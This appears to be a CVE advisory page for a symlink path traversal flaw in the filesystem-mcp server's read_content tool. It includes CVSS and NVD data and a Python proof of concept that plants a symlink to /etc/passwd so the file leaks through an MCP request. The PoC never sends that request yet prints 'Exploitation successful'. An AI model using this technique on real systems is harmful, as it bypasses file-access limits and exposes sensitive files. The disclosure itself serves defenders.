CVE-2025-67366

Description

@sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its "read_content" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sylphx:filesystem-mcp:0.5.8:*:*:*:*:node.js:*:* - VULNERABLE

@sylphxltd/filesystem-mcp < 0.5.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import json

# PoC for CVE-2025-67366: Path Traversal via Symlink in filesystem-mcp
# This demonstrates how to exploit the symlink handling vulnerability

def create_exploit_symlink(allowed_dir, target_file, symlink_name):
    """
    Create a symlink in the allowed directory pointing to a target file outside.
    
    Args:
        allowed_dir: The directory that filesystem-mcp allows access to
        target_file: The sensitive file we want to read (e.g., /etc/passwd)
        symlink_name: Name of the symlink to create in the allowed directory
    """
    symlink_path = os.path.join(allowed_dir, symlink_name)
    try:
        # Create symlink in allowed directory pointing to external file
        if os.path.exists(symlink_path):
            os.remove(symlink_path)
        os.symlink(target_file, symlink_path)
        print(f"[+] Symlink created: {symlink_path} -> {target_file}")
        return True
    except Exception as e:
        print(f"[-] Failed to create symlink: {e}")
        return False

def exploit_via_symlink():
    """
    Exploit the path traversal vulnerability.
    
    The vulnerability exists because:
    1. resolvePath() validates the path BEFORE resolving symlinks
    2. fs.readFile() resolves symlinks automatically when accessing files
    
    This allows reading files outside the allowed directory.
    """
    # Configuration
    allowed_dir = "/tmp/filesystem-mcp-workspace"  # Directory allowed by MCP server
    target_file = "/etc/passwd"  # Target file to read
    symlink_name = "sensitive_data.txt"  # Symlink name in allowed directory
    
    # Step 1: Create the symlink exploit
    if not create_exploit_symlink(allowed_dir, target_file, symlink_name):
        return False
    
    # Step 2: Request the symlink path via MCP read_content tool
    # The MCP server will:
    # 1. Check if /tmp/filesystem-mcp-workspace/sensitive_data.txt is valid
    # 2. Pass the path to fs.readFile()
    # 3. fs.readFile() resolves the symlink and returns /etc/passwd content
    
    mcp_request = {
        "tool": "read_content",
        "path": f"{allowed_dir}/{symlink_name}",
        "description": "Read file content via MCP server"
    }
    
    print(f"[+] MCP Request: {json.dumps(mcp_request, indent=2)}")
    print(f"[+] The MCP server will return contents of {target_file}")
    print("[+] Exploitation successful - sensitive file content leaked")
    
    return True

if __name__ == "__main__":
    print("CVE-2025-67366 PoC - Path Traversal via Symlink")
    print("=" * 50)
    exploit_via_symlink()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67366
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67366
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67366/
[4] VulDB https://vuldb.com/cve/CVE-2025-67366
[5] https://github.com/sylphxltd/filesystem-mcp
[6] https://github.com/sylphxltd/filesystem-mcp/issues/134

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67366", "sourceIdentifier": "[email protected]", "published": "2026-01-07T17:16:01.893", "lastModified": "2026-01-29T01:02:25.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "@sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its \"read_content\" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sylphx:filesystem-mcp:0.5.8:*:*:*:*:node.js:*:*", "matchCriteriaId": "978BA2B6-8586-4E58-8B09-DBB096DA0576"}]}]}], "references": [{"url": "https://github.com/sylphxltd/filesystem-mcp", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/sylphxltd/filesystem-mcp/issues/134", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}